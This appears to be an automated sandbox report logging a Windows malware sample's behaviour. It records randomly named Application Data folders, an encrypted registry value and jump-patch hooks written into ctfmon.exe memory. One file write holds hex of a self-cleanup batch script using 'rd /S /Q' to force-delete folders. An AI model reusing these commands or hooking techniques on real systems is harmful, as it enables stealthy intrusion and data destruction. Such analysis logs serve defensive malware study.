File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107467290
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107475949
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107477628
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2107486184
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2107490477
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 392 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 2107494768
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 2890000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2107497441
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 3430000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2107499194
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 2890000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2107509845
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2107512311
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 2890000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2107519907
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2107522411
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2107534810
Process created PID: 604 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Createflags: 0 success or wait 2107537358
+ Sections
+ General
Start time: 06:06:44
Start date: 01/12/2011
Path: C:\WINDOWS\system32\ctfmon.exe
Commandline: C:\WINDOWS\system32\ctfmon.exe
Imagebase: 0x400000
File size: 15360 bytes
MD5 hash: 5F1D5F88303D4A4DBC8E5F97BA967CC3
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 A446EA
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
none query and write and read commit C20000 12288 own pid read write success or wait 1
none query and write and read commit C20000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 2890000 389120 own pid readonly object name not found 1 A44844
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 A44844
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 A44844
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 A44844
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 A44844
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 A44844
\KnownDlls\Normaliz.dll write and read and execute unknown B90000 36864 own pid read write conflicting addresses 1 A44844
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 A44844
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 A44844
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 A44844
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 A49F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 A49FC6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 A49F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 A49F86
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 1 A44C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 A3C0F6
\BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 1 A44C09
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
908 1828 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 A49D4C
2392 1828 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 A49D4C
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 A4A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 10 B8 35 00 00 00 E9 A9 D1 D4 7B success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 5 E9 33 B7 12 84 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC000A 10 68 6C 02 00 00 E9 1E 63 D5 7B success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 5 E9 94 27 12 84 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0014 10 8B FF 55 8B EC E9 7C 11 C5 7B success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 5 E9 CE 79 22 84 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC001E 10 8B FF 55 8B EC E9 9B FA D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 5 E9 97 45 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0028 10 8B FF 55 8B EC E9 5C EE D9 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D95EE89 5 E9 20 52 0E C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0032 10 8B FF 55 8B EC E9 88 A6 DF 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA6BF 5 E9 3E 9A 08 C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC003C 10 8B FF 55 8B EC E9 25 A6 DF 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA666 5 E9 33 9B 08 C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0046 10 8B FF 55 8B EC E9 3D 90 D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D949088 5 E9 AD B1 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0050 10 8B FF 55 8B EC E9 F6 64 D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94654B 5 E9 2D DD 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC005A 10 8B FF 55 8B EC E9 22 33 DA 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D963381 5 E9 36 0F 0E C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0064 10 8B FF 55 8B EC E9 1A BF D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94BF83 5 E9 7E 83 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC006E 10 8B FF 55 8B EC E9 1A 87 D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94878D 5 E9 A0 BB 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0078 10 8B FF 55 8B EC E9 AE 3D EF 70 success or wait 1 A4A569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe F30000 E2F6A8 page read and write success or wait 1 A44961
1828 C:\WINDOWS\system32\ctfmon.exe F30000 E2F6AC page read and write success or wait 1 A44961
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 E2F47C page execute and read and write success or wait 1 A41A36
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 1000 page execute and read and write page execute and read and write success or wait 52 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC000A 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC0014 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC001E 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC0028 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 A472E5
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid object name not found 1999281293
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1999282619
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 1999286990
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1999288360
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 1999293057
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1999294328
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1999296902
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1999298204
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1999306526
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: B90000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1999311833
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1999317727
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1999325502
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 1999435451
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1999437460
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: F30000 Length: E2F6A8 Allocation Type: null Protection: page read and write success or wait 1999454976
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: F30000 Length: E2F6AC Allocation Type: null Protection: page read and write success or wait 1999455252
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 1999534019
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 1999534725
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 1999535301
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 1999535861
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 1999536426
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999537001
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999537579
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999538167
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999538832
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999539418
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999539993
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999540578
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999541149
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999541728
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999542305
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: E2F47C Allocation Type: null Protection: page execute and read and write success or wait 1999543179
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1999543959
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1999544254
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1999544561
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1999544841
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 D4 7B success or wait 1999545169
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 1999545469
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 1999545762
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 12 84 success or wait 1999546089
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1999546401
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1999547168
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1999547457
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC000A Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1999547759
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1999548051
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 D5 7B success or wait 1999548381
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 1999548647
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 1999548938
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 5 Value: E9 94 27 12 84 success or wait 1999549262
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 1999549573
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1999550275
